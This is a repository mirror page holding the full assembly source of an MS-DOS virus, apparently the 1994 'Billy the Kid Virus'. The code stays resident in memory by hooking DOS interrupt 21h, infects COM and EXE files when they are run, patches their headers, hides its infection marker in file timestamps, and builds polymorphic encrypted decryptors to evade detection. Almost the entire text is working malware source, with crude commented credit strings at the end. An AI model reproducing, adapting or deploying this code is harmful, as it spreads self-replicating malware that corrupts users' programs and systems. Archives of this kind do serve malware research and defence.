ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
b5b08f64b9
MalwareSourceCode/MSDOS/B-Index/Virus.MSDOS.Unknown.brown2.asm
vxunderground 4b9382ddbc re-organize 
push
2022-08-21 04:07:57 -05:00

1040 lines
19 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

assume ss:codevir
pila segment stack 'stack'
db 64 dup ('12345678')
pila ends
code segment
anfitrion:
assume cs:code, ds:code
mov ah, 02h
mov dl, 'z'
int 21h
mov ax, 4C00h
int 21h
code ends
codevir segment
assume cs:codevir, ds:codevir
start:
mov cx, (offset fincomienzo)-(offset comienzo)+(longi)+16
mov si, offset comienzo ; Puesto por el compilador
bucleen:
xor byte ptr cs:[si],00h
xor byte ptr cs:[si],00h
inc si
loop bucleen
;***comienzo***
comienzo:
call acanomas
acanomas label near
pop ax
add ax, offset fincomienzo - offset acanomas
test al, 0Fh
jz noinc
add ax, 0010h
noinc:
mov cl, 04h
shr ax, cl
mov cx, ax
push cs
pop bx
add bx, cx
xor ax, ax
push cs
push bx
push ax
retf ; Salto a OFS0
fincomienzo:
codevir ends
;***OFS0***
porfin segment
assume cs:porfin, ds:porfin
; Estoy en offset 0 con el segmento anterior
; en la pila
add cs:[segcsm], cx
mov ah, 0DDh
int 21h
cmp ax, 'LO'
mov cs:[segant], ds
push cs ; DS = Ac 
pop ds ; ES = Anterior
pop es ;
jnz noactivo
jmp correr
noactivo:
push ds
push es
cld
mov ds, [segant]
push cs
pop es
mov cx, 0010h
xor si, si
mov di, offset bufpsp
rep movsb
pop es
pop ds
call activar
push es
mov es, [segant]
mov cx, 0010h
xor di, di
mov si, offset bufpsp
rep movsb
pop es
correr:
cmp byte ptr [origen], 'C'
jnz desdeexe
desdecom:
mov si, offset original ; Los 3 bytes del comienzo original
mov di, 0100h
cld
movsw
movsb
mov ds, [segant]
push ds
mov ax, 0100h
push ax
retf ; Al comienzo del anfitri¢n
desdeexe:
mov cx, [ofsexe]
mov bx, cs
sub bx, [segcsm]
mov ax, [segstk]
add ax, bx
cli
mov ss, ax
mov sp, [ofsstk]
sti
mov ax, [segexe]
add ax, bx
mov es, [segant]
mov ds, [segant]
push ax
push cx
retf ; Al comienzo del anfitri¢n
activar proc
cli
push es
mov es, [segant]
mov ah, 49h
int 21h
mov ah, 48h
mov bx, 0FFFFh
int 21h
sub bx, tamres+1
mov ah, 4Ah
int 21h
mov ax, es
add ax, bx
mov word ptr cs:[bufpsp + 0002h], ax
mov ah, 48h
mov bx, tamres
int 21h
mov es, ax
call recubre
copiamem:
xor si, si
mov di, si
mov cx, longi
cld
rep movsb
push es
pop ds
mov ax, 3521h
int 21h
mov [int21cs], es
mov [int21ip], bx
mov dx, offset handler
call setintvec
push cs
pop ds
noalcanza:
pop es
sti
ret
activar endp
recubre proc
push ax
mov ax, es
dec ax
mov es, ax
mov word ptr es:[0001h], 0008h
mov ax, es
inc ax
mov es, ax
pop ax
ret
recubre endp
setintvec proc
; Entrada:
; AL : N£mero de interrupci¢n
; DS:DX : Puntero al handler
pushf
push ax
push bx
push es
cli
xor bh, bh
mov bl, al
shl bx, 01h
shl bx, 01h
xor ax, ax
mov es, ax
mov es:[bx], dx
mov es:[bx+02h],ds
pop es
pop bx
pop ax
popf
ret
setintvec endp
handler proc
cmp ah, 0DDh
jne vamo
mov ax, 'LO'
iret
vamo:
cmp ah, 4Bh
je fexec
finfexec:
jmp dword ptr cs:[int21ip]
handler endp
fexec proc
cld
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
mov ah, 48h
mov bx, 0100h
pushf
call dword ptr cs:[int21ip]
jc memoerror1
mov es, ax
push es
push ds
push dx
mov ax, 3524h
pushf
call dword ptr cs:[int21ip]
mov cs:[int24ip], bx
mov cs:[int24cs], es
mov dx, offset hand24
push cs
pop ds
call setintvec
pop dx
pop ds
pop es
call getattr
mov ax, 3D02h
pushf
call dword ptr cs:[int21ip]
jc openerror1
push ds
push dx
mov bx, ax
mov cs:[fhandle], ax
mov ah, 3Fh
mov cx, 0004h
push cs
pop ds
mov dx, offset original ; Estos bytes ahora est n inutilizados
pushf
call dword ptr cs:[int21ip]
pop dx
pop ds
jc readerror1
push dx
mov ax, 5700h
pushf
call dword ptr cs:[int21ip]
mov cs:[fhora], cx
mov cs:[ffecha],dx
pop dx
and cl, 00000111b
cmp cl, 00000101b
jz readerror1 ; 'ta listo
push ds
push dx
xor bp, bp
cmp cs:[original],'ZM'
jz dale ; Dale al COM
inc bp
jmp dale ; Dale al EXE
openerror1: ; Para permitir saltos cortos
jmp openerror ;
memoerror1: ;
jmp memoerror ;
readerror1: ;
jmp readerror ;
writeerror1: ;
jmp writeerror ;
dale:
push cs
pop ds
mov [origen],'C'
or bp, bp
jnz escom1
mov [origen],'E'
escom1:
call alineafile ; DX:AX = Nueva longitud del archivo
cmp dl, 08h
ja writeerror1 ; Archivo de mas de 600k
push ax
push dx
mov cs:[longhi], dx
mov cs:[longlo], ax
call crea ; DI = Longitud del bloque a meter
jnc bien
pop ds
pop ax
jmp writeerror
bien:
mov bx, [fhandle]
push es
pop ds
pop dx
pop ax
push ax
add ax, 0100h
mov si, cs:[ddespl]
or bp, bp
jz esexe2
add [si+01h], ax
esexe2:
mov cx, di
mov ah, 40h
xor dx, dx
pushf
call dword ptr cs:[int21ip]
pop dx
jc writeerror
cmp ax, cx
jb writeerror
push cs
pop ds
sub dx, 0003h
mov [dsalto], dx
mov ax, 4200h
xor cx, cx
mov dx, cx
pushf
call dword ptr cs:[int21ip]
or bp, bp
jz esexe3
mov ah, 40h
mov cx, 0003h
mov dx, offset cambiazo
pushf
call dword ptr cs:[int21ip]
jc writeerror
esexe3:
mov dx,[ffecha]
mov cx,[fhora]
and cl, 11111000b
or cl, 00000101b
mov ax, 5701h
pushf
call dword ptr cs:[int21ip]
writeerror:
pop dx
pop ds
readerror:
mov ah, 3Eh
pushf
call dword ptr cs:[int21ip]
openerror:
call setattr
mov dx, [int24ip]
mov ds, [int24cs]
mov al, 24h
call setintvec
mov ah, 49h
pushf
call dword ptr cs:[int21ip]
memoerror:
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jmp finfexeC
fexec endp
alineafile proc
xor cx, cx
mov dx, cx
mov ax, 4202h
pushf
call dword ptr cs:[int21ip]
mov cx, ax
neg cl
and cx, 000Fh
mov cs:[agregado], cx
mov ah, 40h
pushf
call dword ptr cs:[int21ip]
mov ax, 4202h
xor cx, cx
mov dx, cx
pushf
call dword ptr cs:[int21ip]
ret
alineafile endp
getattr proc
mov ax, 4300h
pushf
call dword ptr cs:[int21ip]
mov cs:[fattr], cx
mov ax, 4301h
xor cx, cx
pushf
call dword ptr cs:[int21ip]
ret
getattr endp
setattr proc
mov ax,4301h
mov cx, cs:[fattr]
pushf
call dword ptr cs:[int21ip]
ret
setattr endp
hand24 proc
xor al, al
iret
hand24 endp
crea proc
; Entrada
; ES := Segmento a donde se va a crear
; DS := Segmento de c¢digo
; Salida
; DI := Longitud
xor di, di
push bx
call genpar
pop bx
push di
mov cx, offset fincomienzor-offset comienzor
mov si, offset comienzor
rep movsb
alinea:
test di, 000Fh
jz yalineado
inc di
jmp alinea
yalineado:
or bp, bp
jnz escom41
push ds
push es
pop ds
xor cx, cx
mov dx, cx
mov ax, 4200h
pushf
call dword ptr cs:[int21ip]
mov ah, 3Fh
mov cx, 001Ch
lea dx, [di+offset finporfin]
mov si, dx
pushf
call dword ptr cs:[int21ip]
jc puchaaaa1
mov ax, cs:[longlo] ;
mov dx, cs:[longhi] ; Compruebo si tiene overlays
sub ax, cs:[agregado] ;
sbb dx, 0000h ;
mov cx, 0200h ;
div cx ;
or dx, dx ;
jz nomas2 ;
inc ax ;
nomas2: ;
cmp dx, [si+02h] ;
jne puchaaaa1 ;
cmp ax, [si+04h] ;
jne puchaaaa1 ;
mov ax, [si+08h]
mov cs:[shead], ax
mov ax, [si+0Ah]
mov cs:[minimo], ax
mov ax, [si+10h]
mov cs:[ofsstk], ax
mov ax, [si+0Eh]
mov cs:[segstk], ax
mov ax, [si+14h]
mov cs:[ofsexe], ax
mov ax, [si+16h]
mov cs:[segexe], ax
push bx
jmp fsdf
puchaaaa1:
jmp puchaaaa
escom41:
jmp escom4
fsdf:
mov ax, cs:[longlo]
mov dx, cs:[longhi]
push ax
push dx
add ax, offset finporfin
adc dx, 0000h
add ax, di
adc dx, 0000h
mov cx, 0200h
div cx
or dx, dx
jz nomas1
inc ax
nomas1:
mov [si+02h], dx
mov [si+04h], ax
mov cs:[fsize], ax
pop dx
pop ax
mov bx, dx
mov cl, 04h
shr ax, cl
shr dx, cl
mov cl, 0Ch
and bx, 000Fh
shl bx, cl
or ax, bx
pop bx
sub ax, [si+08h]
mov [si+16h], ax
mov cs:[segcsm], ax
dec ax
mov [si+0Eh], ax
lea ax, [di+offset finporfin+00FFh]
mov [si+10h], ax
mov word ptr [si+14h], 0000h
mov ax, 4200h
xor cx, cx
mov dx, cx
pushf
call dword ptr cs:[int21ip]
mov ah, 40h
mov cx, 001Ch
mov dx, si
pushf
call dword ptr cs:[int21ip]
jc puchaaaa
pop ds
escom4:
xor si, si
mov cx, offset finporfin
rep movsb
mov ax, di
pop di
push ax
sub ax, di
mov cx, ax
dec ax
dec ax
mov si, di
mov di, [dlongit]
mov es:[di+01h], ax
pop di
push ds
push es
pop ds
call encript
pop ds
mov ax, 4202h
xor cx, cx
mov dx, cx
pushf
call dword ptr cs:[int21ip]
clc
ret
puchaaaa:
pop ds
pop di
stc
ret
crea endp
;*******************COMIENZO DE RUTINAS PMORFICAS******************
rand proc near
push ds
push es
push bx
xor ax, ax
mov es, ax
mov ax, cs:[segale]
cmp ax, 61440
jb menor
mov ax, 61339
menor:
mov ds, ax
mov bx, cs:[ofsale]
mov ax, [bx]
mov cs:[segale], ax
mov bx, es:[046Ch]
mov ax, [bx]
add bx, ax
mov cs:[ofsale], bx
mov ax, [bx+10]
xor ax, bx
pop bx
pop es
pop ds
ret
rand endp
encript proc near
;Entrada
; DS:SI := Puntero a comienzo
; CX := Longitud
push si
bucle:
clave1 label byte
db 80h, 34h, 0FFh ; xor byte ptr [si],0FFh
clave2 label byte
db 80h, 04h, 0FFh ; add byte ptr [si],0FFh
inc si
loop bucle
pop si
ret
encript endp
fillclv proc near
;ENTRADA
; DH : Clave(0=Clave1/1=Clave2)
xor bh, bh
call rand
mov bl, al
and bl, 03h ; 03h = 00000011b
mov al, 80h
mov ah, offset tencri[bx]
or dh, dh
jz sc2
mov word ptr ds:[offset clave1], ax
mov ah, offset tencri[bx+4]
mov word ptr ds:[offset clavd1], ax
jmp short finfillclv
sc2:
mov word ptr ds:[offset clave2], ax
mov ah, offset tencri[bx+4]
mov word ptr ds:[offset clavd2], ax
finfillclv:
ret
fillclv endp
pone proc near
;Entrada
; AH := Modo (0=in£til/1=£til)
push cx
or ah, ah
jz noutil
xor dh, dh
mov dl, 0Ah
sub dl, cl
cmp dl, 03h
jz estres
cmp dl, 04h
jz escuatro
cmp dl, 05h
jz esdos
cmp dl, 08h
jz esocho
jmp listo
esdos:
mov [dirbucle], di
jmp listo
estres:
mov [dlongit], di
jmp listo
escuatro:
mov [ddespl], di
jmp listo
esocho:
mov [dirfbucle], di
listo:
mov cx, offset tablas
mov bx, offset tablasi
call lopone
jmp short finpone
noutil:
push cx
mov ah, 2Ah ; Get system date
pushf
call dword ptr cs:[int21ip]
mov si, dx
mov ah, 2Ch ; Get system time
pushf
call dword ptr cs:[int21ip]
xor si, dx
and si, 0001h ; 0003h= 00000000 00000001b
inc si
mov cx, si
bucle2:
push cx
call rand
xor dh, dh
mov dl, al
and dl, 07h ; 07h = 00000111b
mov cx, offset tablln
mov bx, offset tablano
call lopone
pop cx
loop bucle2
pop cx
finpone:
pop cx
ret
proc lopone
shl dl, 1
add dx, cx
push bx
mov bx, dx
mov ax, [bx]
pop bx
mov cl, ah
xor ch, ch
mov si, bx
xor ah, ah
add si, ax
cld
rep movsb
ret
lopone endp
pone endp
genpar proc near
;Entrada
; ES:DI := Puntero a desencriptor a generar
; DS := Segmento de c¢digo
push ds
push es
push cs
pop ds
call rand
mov ds:[offset clavd2+2], ah ;
mov ds:[offset clave2+2], ah ; Set up claves
mov ds:[offset clavd1+2], al ;
mov ds:[offset clave1+2], al ;
xor dh, dh
call fillclv
inc dh
call fillclv
mov cx, 000Ah
pop es
bucle1:
xor ah, ah
call pone
inc ah
call pone
loop bucle1
push di
mov di, [dirfbucle]
inc di
mov ax, di
inc ax
sub ax, [dirbucle]
neg ax
stosb
mov di, [ddespl]
pop ax
mov es:[di+01h], ax
mov di, ax
pop ds
ret
genpar endp
;************************TABLA DE ENCRIPTORES******************
tencri label byte
db 04h
db 2Ch
db 34h
db 34h
db 2Ch
db 04h
db 34h
db 34h
;************************FIN TABLA ENCRIPTORES******************
;****************************TABLA UTIL***************************
tablas db 00, 01, 01, 01, 02, 01, 03, 03, 06, 03, 09, 03, 12, 03, 15, 01
db 16, 02, 18, 01
tablasi label byte
db 1Eh ; push ds
db 0Eh ; push cs
db 1Fh ; pop ds
db 0B9h ; mov cx, Longitud a desencriptar
dlongit dw ? ;
db 0BEh ; mov si, Comienzo
ddespl dw ? ;
clavd2 db 3 DUP (?)
clavd1 db 3 DUP (?)
db 46h ; inc si
db 0E2h ; loop bucle
salto db ?
db 1Fh ; pop ds
;******************************FIN TABLA UTIL************************
;****************************TABLA INUTIL***************************
tablln DB 00, 01, 01, 03, 04, 03, 07, 01, 08, 01, 09, 04, 13, 05, 18, 01
tablano label byte
db 90h
db 25h, 0FFh, 0FFh
db 0Dh, 00h, 00h
db 0F8h
db 0F9h
db 81h, 0C9h, 00h, 00h
db 80h, 06h, 34h, 12h, 00h
db 0FCh
;***********************FIN TABLA INUTIL**************************
;****************************VARIABLES***************************
dirbucle dw ?
dirfbucle dw ?
segale dw ?
ofsale dw ?
;*****************************FIN DE RUTINAS PMORFICAS****************
;Repetici¢n, pero en el otro segmento para que quede residente
comienzor:
call acanomasr
acanomasr label near
pop ax
add ax, offset fincomienzor - offset acanomasr
test al, 0Fh
jz noincr
add ax, 0010h
noincr:
mov cl, 04h
shr ax, cl
mov cx, ax
push cs
pop bx
add bx, ax
xor ax, ax
push cs
push bx
push ax
retf ; Salto a OFS0
fincomienzor:
;*****************************VARIABLES*******************************
longi = offset finporfin
tamres = 0100h
segant dw ?
origen db 'E'
bufpsp db 10h dup(?)
original label word
segexe dw 32
ofsexe dw 0
segcsm dw 33
segstk dw 0
ofsstk dw 0200h
fsize dw 3
shead dw 32
minimo dw 1
fhandle dw ?
fhora dw ?
ffecha dw ?
fattr dw ?
tapon db 'COMMAND'
cambiazo db 0E9h
dsalto DW ?
longlo dw ?
longhi dw ?
int21ip dw ?
int21cs dw ?
int24ip dw ?
int24cs dw ?
agregado dw ?
; db ' (C)1994 S.A.O. Texas. Billy the Kid Virus.'
; db ' Look out boy! This is the only far west virus that will make'
; db ' you cry for being born.'
; db ' P.S. : Listen Led Zeppelin and AC/DC with your sons and God'
; db ' will bless ya. '
; db ' Leave Castro alone.'
; db ' Superman... Why don't you fuck Luisa????'
; db " That's not a fuckin grafitti, it's a sign."
; db 'Jeroboam y todo el pueblo volvieron a ver a Rehoboam al tercer '
; db 'dia como lo ordeno el rey.'
; db 'I hate moscas.'
; db 'Hecho en China...no piensen que se hizo aca en Argentina.'
finporfin label byte
porfin ends
end start
Reference in New Issue View Git Blame Copy Permalink